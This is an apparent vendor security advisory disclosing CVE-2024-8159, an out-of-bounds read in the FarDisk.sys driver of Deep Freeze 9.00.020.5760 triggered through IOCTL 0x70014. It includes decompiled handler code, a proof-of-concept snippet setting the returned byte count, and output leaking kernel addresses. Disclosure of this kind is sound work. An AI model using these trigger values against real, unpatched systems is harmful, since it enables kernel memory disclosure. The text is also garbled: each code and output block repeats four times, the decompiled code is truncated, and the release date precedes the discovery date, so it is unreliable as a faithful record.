

Advisories

Deep Freeze - Out-of-bounds Read

6.4

Medium

Discovered by

Andres Roldan

Offensive Team, Fluid Attacks

Summary

Full name

Deep Freeze 9.00.020.5760 - Out-of-bounds read

Code name

El Kanka

State

Public

Release date

Aug 24, 2024

Affected product

Deep Freeze

Vendor

Faronics Corporation

Affected version(s)

Version 9.00.020.5760

Vulnerability name

Out-of-bounds read

Vulnerability type

111. Out-of-bounds Read

Remotely exploitable

CVSS v3.1 vector string

CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:L

CVSS v3.1 base score

6.4

Exploit available

Yes

CVE ID(s)

CVE-2024-8159

Description

Deep Freeze 9.00.020.5760 is vulnerable to an out-of-bounds read vulnerability by triggering the 0x70014 IOCTL code of the FarDisk.sys driver.

Vulnerability

The 0x70014 IOCTL code of the FarDisk.sys driver allows performing an Out-of-bounds read.

The following is the handling code of the 0x70014 IOCTL:

 if ( CurrentStackLocation->Parameters.Create.Options >= 0x10 )
 {
 v10 = 0;
 Irp->IoStatus.Information = LODWORD(Irp->AssociatedIrp.SystemBuffer->MdlAddress);
      goto LABEL_73

 if ( CurrentStackLocation->Parameters.Create.Options >= 0x10 )
 {
 v10 = 0;
 Irp->IoStatus.Information = LODWORD(Irp->AssociatedIrp.SystemBuffer->MdlAddress);
      goto LABEL_73

 if ( CurrentStackLocation->Parameters.Create.Options >= 0x10 )
 {
 v10 = 0;
 Irp->IoStatus.Information = LODWORD(Irp->AssociatedIrp.SystemBuffer->MdlAddress);
      goto LABEL_73

 if ( CurrentStackLocation->Parameters.Create.Options >= 0x10 )
 {
 v10 = 0;
 Irp->IoStatus.Information = LODWORD(Irp->AssociatedIrp.SystemBuffer->MdlAddress);
      goto LABEL_73

When the nInBufferSize parameter of the IOCTL request is greater or equal than 0x10, the second DWORD of the user-controlled SystemBuffer is passed to the IO manager as the returned bytes for the IO response. This allows an attacker to control how many bytes to read past the allocated SystemBuffer memory block.

A snipped of the proof-of-concept code is the following:

((PDWORD64)((DWORD64)inBuf + 0))[0] = (ULONGLONG)0x4141414141414141;
((PDWORD64)((DWORD64)inBuf + 8))[0] = (ULONGLONG)0x4242424243434343;


DWORD IoControlCode = 0x70014;
InputBuffer = (ULONGLONG)inBuf;
DWORD InputBufferLength = 0x10;
OutputBuffer = (ULONGLONG)outBuf;
DWORD OutputBufferLength = 0x10

((PDWORD64)((DWORD64)inBuf + 0))[0] = (ULONGLONG)0x4141414141414141;
((PDWORD64)((DWORD64)inBuf + 8))[0] = (ULONGLONG)0x4242424243434343;


DWORD IoControlCode = 0x70014;
InputBuffer = (ULONGLONG)inBuf;
DWORD InputBufferLength = 0x10;
OutputBuffer = (ULONGLONG)outBuf;
DWORD OutputBufferLength = 0x10

((PDWORD64)((DWORD64)inBuf + 0))[0] = (ULONGLONG)0x4141414141414141;
((PDWORD64)((DWORD64)inBuf + 8))[0] = (ULONGLONG)0x4242424243434343;


DWORD IoControlCode = 0x70014;
InputBuffer = (ULONGLONG)inBuf;
DWORD InputBufferLength = 0x10;
OutputBuffer = (ULONGLONG)outBuf;
DWORD OutputBufferLength = 0x10

((PDWORD64)((DWORD64)inBuf + 0))[0] = (ULONGLONG)0x4141414141414141;
((PDWORD64)((DWORD64)inBuf + 8))[0] = (ULONGLONG)0x4242424243434343;


DWORD IoControlCode = 0x70014;
InputBuffer = (ULONGLONG)inBuf;
DWORD InputBufferLength = 0x10;
OutputBuffer = (ULONGLONG)outBuf;
DWORD OutputBufferLength = 0x10

With that, the attacker can read 0x42424242 bytes from adjacent objects, leaking whatever the object leaked can have, including user and kernel addresses:

PS C:\Users\admin\Desktop> .\PoC.exe
[+] 0x70014: Bytes returned: 1111638594 (0x42424242)
[+] Truncated (0x50) output (0): 4141414141414141
[+] Truncated (0x50) output (8): 4242424242424242
[+] Truncated (0x50) output (16): 00007FFAFDAE7F04
[+] Truncated (0x50) output (24): 0000000000000000
[+] Truncated (0x50) output (32): 0000000000000000
[+] Truncated (0x50) output (40): 0000000000000000
[+] Truncated (0x50) output (48): 0000000000000000
[+] Truncated (0x50) output (56): 0000000000000000
[+] Truncated (0x50) output (64): FFFFAD81A464B998
[+] Truncated (0x50) output (72): 0000000000000001
[+] Truncated (0x50) output (80): 77776D4D02060000
[+] Truncated (0x50) output (88): 0000000000000000
[+] Truncated (0x50) output (96): 0000000000000000
[+] Truncated (0x50) output (104): FFFFAD819DCFB970
[+] Truncated (0x50) output (112): 0000000000000000
[+]

PS C:\Users\admin\Desktop> .\PoC.exe
[+] 0x70014: Bytes returned: 1111638594 (0x42424242)
[+] Truncated (0x50) output (0): 4141414141414141
[+] Truncated (0x50) output (8): 4242424242424242
[+] Truncated (0x50) output (16): 00007FFAFDAE7F04
[+] Truncated (0x50) output (24): 0000000000000000
[+] Truncated (0x50) output (32): 0000000000000000
[+] Truncated (0x50) output (40): 0000000000000000
[+] Truncated (0x50) output (48): 0000000000000000
[+] Truncated (0x50) output (56): 0000000000000000
[+] Truncated (0x50) output (64): FFFFAD81A464B998
[+] Truncated (0x50) output (72): 0000000000000001
[+] Truncated (0x50) output (80): 77776D4D02060000
[+] Truncated (0x50) output (88): 0000000000000000
[+] Truncated (0x50) output (96): 0000000000000000
[+] Truncated (0x50) output (104): FFFFAD819DCFB970
[+] Truncated (0x50) output (112): 0000000000000000
[+]

PS C:\Users\admin\Desktop> .\PoC.exe
[+] 0x70014: Bytes returned: 1111638594 (0x42424242)
[+] Truncated (0x50) output (0): 4141414141414141
[+] Truncated (0x50) output (8): 4242424242424242
[+] Truncated (0x50) output (16): 00007FFAFDAE7F04
[+] Truncated (0x50) output (24): 0000000000000000
[+] Truncated (0x50) output (32): 0000000000000000
[+] Truncated (0x50) output (40): 0000000000000000
[+] Truncated (0x50) output (48): 0000000000000000
[+] Truncated (0x50) output (56): 0000000000000000
[+] Truncated (0x50) output (64): FFFFAD81A464B998
[+] Truncated (0x50) output (72): 0000000000000001
[+] Truncated (0x50) output (80): 77776D4D02060000
[+] Truncated (0x50) output (88): 0000000000000000
[+] Truncated (0x50) output (96): 0000000000000000
[+] Truncated (0x50) output (104): FFFFAD819DCFB970
[+] Truncated (0x50) output (112): 0000000000000000
[+]

PS C:\Users\admin\Desktop> .\PoC.exe
[+] 0x70014: Bytes returned: 1111638594 (0x42424242)
[+] Truncated (0x50) output (0): 4141414141414141
[+] Truncated (0x50) output (8): 4242424242424242
[+] Truncated (0x50) output (16): 00007FFAFDAE7F04
[+] Truncated (0x50) output (24): 0000000000000000
[+] Truncated (0x50) output (32): 0000000000000000
[+] Truncated (0x50) output (40): 0000000000000000
[+] Truncated (0x50) output (48): 0000000000000000
[+] Truncated (0x50) output (56): 0000000000000000
[+] Truncated (0x50) output (64): FFFFAD81A464B998
[+] Truncated (0x50) output (72): 0000000000000001
[+] Truncated (0x50) output (80): 77776D4D02060000
[+] Truncated (0x50) output (88): 0000000000000000
[+] Truncated (0x50) output (96): 0000000000000000
[+] Truncated (0x50) output (104): FFFFAD819DCFB970
[+] Truncated (0x50) output (112): 0000000000000000
[+]

Our security policy

We have reserved the ID CVE-2024-8159 to refer to this issue from now on.

Disclosure policy

System Information

Version: Deep Freeze 9.00.020.5760
Operating System: Windows

Mitigation

There is currently no patch available for this vulnerability.

References

Vendor page https://www.faronics.com/
Product page https://www.faronics.com/es/products/deep-freeze

Credits

The vulnerability was discovered by Andres Roldan from Fluid Attacks' Offensive Team.

Timeline



Aug 25, 2024

Vulnerability discovered



Aug 25, 2024

Vendor contacted



Oct 3, 2024

Public disclosure

Does your application use this vulnerable software?

During our free trial, our tools assess your application, identify vulnerabilities, and provide recommendations for their remediation.

Start free trial

Fluid Attacks' solutions enable organizations to identify, prioritize, and remediate vulnerabilities in their software throughout the SDLC. Supported by AI, automated tools, and pentesters, Fluid Attacks accelerates companies' risk exposure mitigation and strengthens their cybersecurity posture.

Get an AI summary of Fluid Attacks